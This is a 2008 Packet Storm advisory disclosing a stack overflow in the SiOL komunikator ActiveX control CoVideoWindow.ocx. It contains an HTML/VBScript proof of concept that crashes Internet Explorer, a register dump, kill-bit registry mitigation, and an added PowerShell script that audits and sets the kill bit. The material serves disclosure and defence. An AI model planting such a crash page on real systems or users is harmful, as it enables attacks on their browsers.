siol-overflow.txt

2008-07-29T00:00:00
ID PACKETSTORM:68599
Type packetstorm
Reporter Edi Strosar
Modified 2008-07-29T00:00:00

Description

=========================================================================  
  
SiOL komunikator IM ActiveX stack overflow condition  
  
=========================================================================  
  
Release date: 30.7.2008  
Severity: Moderately critical  
Impact: Stack overflow  
Remote: Yes  
Status: Unpatched  
Software: SiOL Komunikator v1.3 (SLO_71130)  
Tested on: Microsoft Windows XP SP3 / IE6 SP3  
Developer: http://www.siol.net/  
http://www.eyeball.com/  
Disclosed by: Edi Strosar  
  
  
Vendor's description of affected application:  
=============================================  
"SiOL komunikator is instant messaging software that supports comprehensive communication with text messages, file exchange, and the option of voice and video calls, without a telephone set and from any location where an Internet connection is available."  
  
English translation (sort of):  
SiOL komunikator is an instant messaging (IM) application based on Eyeball Communicator offered by SiOL (Slovenia On-Line) ISP.  
  
Download link:  
http://www.siol.net/spletne_storitve/siol_komunikator.aspx  
  
  
ActiveX control overview:  
=========================  
Developer: Eyeball Networks, Inc.  
Version: 5.0.907.1  
Component: CoVideoWindow.ocx  
GUID: {CA06EE71-7348-44C4-9540-AAF0E6BD1515}  
RegKey Safe for Script: False  
RegKey Safe for Init: False  
Implements IObjectSafety: True  
KillBitSet: False  
  
  
Description:  
============  
SiOL komunikator's ActiveX component CoVideoWindow.ocx is susceptible to a stack overflow condition in its BgColor() method, which may lead to remote code execution. The vulnerability could be exploited if a user with SiOL komunikator installed visits a specially crafted web page.  
  
  
Proof of concept:  
=================  
The following test case crashes Internet Explorer:  
  
<html>  
<object classid='clsid:CA06EE71-7348-44c4-9540-AAF0E6BD1515' id='test'></object>  
<input language=VBScript onclick=buffero() type=button value="Crash">  
<script language = 'vbscript'>  
Sub buffero()  
  
crash = String(515000, unescape("%41"))  
test.BgColor = crash  
End Sub  
  
</script>  
</html>  
  
Note: close all Internet Explorer instances before executing PoC!  
  
Tested with SiOL komunikator v1.3 (SLO_71130). Other versions may be affected.  
  
  
Exception overview:  
===================  
----------------------------------------------------------------  
Exception C00000FD (STACK_OVERFLOW)  
----------------------------------------------------------------  
EAX=00000774: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  
EBX=00000003: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  
ECX=000428F4: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  
EDX=000FB770: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  
ESP=0013D8EC: C6 9A 80 7C 0D B9 E8 01-00 00 00 00 20 39 EC 01  
EBP=0013D904: 44 D9 13 00 1C 9F E8 01-1C D9 13 00 24 00 39 02  
ESI=000FB772: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  
EDI=02390024: 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  
EIP=01E93635: 85 01 3D 00 10 00 00 73-EC 2B C8 8B C4 85 01 8B  
--> TEST [ECX],EAX  
----------------------------------------------------------------  
  
  
Mitigation:  
===========  
Set the kill bit (http://support.microsoft.com/kb/240797).  
  
Paste the following text in a text editor such as Notepad. Then, save the file by using the .reg file name extension.  
  
Windows Registry Editor Version 5.00  
  
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CA06EE71-7348-44c4-9540-AAF0E6BD1515}]  
"Compatibility Flags"=dword:00000400  
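An added PowerShell script, not part of the original advisory, that audits whether the kill bit above is set for this control's CLSID and, when run from an elevated prompt with -Apply, sets it while preserving any Compatibility Flags already present; the function names and the -Apply switch are this example's own.

```powershell
# Added example, not part of the original advisory. Checks and optionally sets
# the IE kill bit (Compatibility Flags bit 0x400) for the CoVideoWindow.ocx
# CLSID from the advisory. Function names and -Apply are assumptions here.
param([switch]$Apply)

$KillBit = 0x400
$Clsid   = '{CA06EE71-7348-44C4-9540-AAF0E6BD1515}'
$CompatPaths = @(
    "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid",
    # 32-bit IE on 64-bit Windows consults the WOW6432Node view of this key
    "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
)

function Test-KillBit {
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path $Path)) { return $false }
    $flags = (Get-ItemProperty -Path $Path -Name 'Compatibility Flags' `
              -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $flags) { return $false }
    # Other compatibility bits may be present; only 0x400 disables the control
    return (($flags -band $KillBit) -eq $KillBit)
}

function Set-KillBit {
    param([Parameter(Mandatory)][string]$Path)
    # Writing under HKLM requires an elevated (administrator) session
    if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
    $existing = (Get-ItemProperty -Path $Path -Name 'Compatibility Flags' `
                 -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $existing) { $existing = 0 }
    # OR the kill bit in so that flags already set are preserved
    Set-ItemProperty -Path $Path -Name 'Compatibility Flags' -Type DWord `
        -Value ($existing -bor $KillBit)
}

foreach ($path in $CompatPaths) {
    if (Test-KillBit -Path $path) {
        Write-Output "kill bit set:     $path"
    } elseif ($Apply) {
        Set-KillBit -Path $path
        Write-Output "kill bit applied: $path"
    } else {
        Write-Output "kill bit MISSING: $path (re-run with -Apply)"
    }
}
```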
  
  
Timeline:  
=========  
12.07.2008 - initial developer notification  
- no response  
20.07.2008 - additional developer notification  
- no response  
30.07.2008 - public disclosure  
  
  
Contact:  
========  
edi [dot] strosar [at] gmail [dot] com  
  
  
Disclaimer:  
===========  
The content of this report is purely informational and meant for educational purposes only. Author shall in no event be liable for any damage whatsoever, direct or implied, arising from use or spread of this information. Any use of information in this advisory is entirely at user's own risk.  
  
=========================================================================